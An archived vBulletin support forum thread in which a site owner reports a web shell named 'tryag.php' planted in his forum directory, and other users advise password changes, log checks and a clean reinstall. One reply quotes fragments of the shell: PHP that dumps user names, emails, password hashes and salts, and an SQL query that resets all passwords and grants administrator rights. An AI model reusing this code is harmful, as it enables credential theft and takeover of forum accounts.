vb.org Archive
Page 1 of 2 1 2
Show 40 post(s) from this thread on one page

vb.org Archive (https://vborg.vbsupport.ru/index.php)
-   vB4 General Discussions (https://vborg.vbsupport.ru/forumdisplay.php?f=251)
-   -   Hacked by "Tryag" (https://vborg.vbsupport.ru/showthread.php?t=311141)

Jaggee 05-07-2014 04:06 PM
Hacked by "Tryag"
 
<a href="http://pastebin.com/6k6UYFYJ" target="_blank">http://pastebin.com/6k6UYFYJ</a>
That file got uploaded to my forum directory somehow, no clue how.

ForceHSS 05-07-2014 04:31 PM
It was uploaded from the ftp change ftp, cpanel, and forum admin passwords. Check all files in the ftp then once you have removed all they uploaded then upload a fresh copy yourself then also check if they logged into the admin panel if so check logs

Lynne 05-07-2014 05:12 PM
Your server logs should tell you how they uploaded the file. You should contact your host and have them look through the logs with you to figure out how this was done.

helmer.co 05-08-2014 09:17 AM
What was the file name an directory? Also what version of VB4 are you running.

ForceHSS 05-08-2014 09:58 AM
Quote:
Originally Posted by Jaggee (Post 2496666)
http://pastebin.com/6k6UYFYJ
That file got uploaded to my forum directory somehow, no clue how.
If you check that coding its nasty this is what I mean
Code:
<td class="style5"><?echo $r[userid]?></td>
                                <td class="style5"><?echo $r[username]?></td>
                                <td class="style5"><?echo $r[email]?></td>
                                <td class="style5"><?echo $r[password]?></td>
                                <td class="style5"><?echo $r[salt]?></td>
And
Code:
$okey=mysql_query("UPDATE user SET password='e8be21235122e78d824eef4514b87be4',salt='oky',usergroupid='6'");
But there is even worst parts in the code to worry about in there

Jaggee 05-08-2014 01:13 PM
Quote:
Originally Posted by helmer.co (Post 2496775)
What was the file name an directory? Also what version of VB4 are you running.
Latest version of vB4, that was on root directory of the forum, filename called "tryag.php"

Didn't find out how it was uploaded, by logs.

Lynne 05-08-2014 05:14 PM
Which logs did you check? If you only checked your access_logs and nothing was in there, then that means they didn't use the software to upload the file and so they must have done this directly via your server.

Jaggee 05-08-2014 06:29 PM
Quote:
Originally Posted by Lynne (Post 2496845)
Which logs did you check? If you only checked your access_logs and nothing was in there, then that means they didn't use the software to upload the file and so they must have done this directly via your server.
When you connect with SSH, it instantly uses the command "sftp", which calls for the SFTP software to transfer files, basically like FTP. The Shell logs (messages & secure) only shows commands, not what happens inside the software. & sftp-server never showed any logs.

Lionel 05-09-2014 12:07 AM
My admincp of one my sites once got hacked. They created a plugin that could be ran via ranks.php and have complete control of my server. Since then I stealth protect that admin folder in addition to firewall SSH, FTP. What was stranged but I never complained, the password I was using was unique and specific only on two sites: here and that site. Lucky for me I basically live on my PC and I was able to catch that P0wersurge SOB instantly and protect myself.

helmer.co 05-09-2014 12:20 AM
Quote:
Originally Posted by Jaggee (Post 2496805)
Latest version of vB4, that was on root directory of the forum, filename called "tryag.php"

Didn't find out how it was uploaded, by logs.
When you say the latest version, you mean 4.22 PL1 with the install directory deleted correct? It is really a shame your logs did not show anything. Do you suspect he hacked your root name and password?

Did you use them at any other sites?


All times are GMT. The time now is 08:48 AM.
Page 1 of 2 1 2
Show 40 post(s) from this thread on one page

Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.

X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.04708 seconds
  • Memory Usage 1,735KB
  • Queries Executed 10 (?)
More Information
Template Usage:
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (2)bbcode_code_printable
  • (4)bbcode_quote_printable
  • (1)footer
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (6)option
  • (1)pagenav
  • (1)pagenav_curpage
  • (1)pagenav_pagelink
  • (1)post_thanks_navbar_search
  • (1)printthread
  • (10)printthreadbit
  • (1)spacer_close
  • (1)spacer_open 
Phrase Groups Available:
  • global
  • postbit
  • showthread
Included Files:
  • ./printthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/class_bbcode_alt.php
  • ./includes/class_bbcode.php
  • ./includes/functions_bigthree.php 
Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • printthread_start
  • pagenav_page
  • pagenav_complete
  • bbcode_fetch_tags
  • bbcode_create
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • printthread_post
  • printthread_complete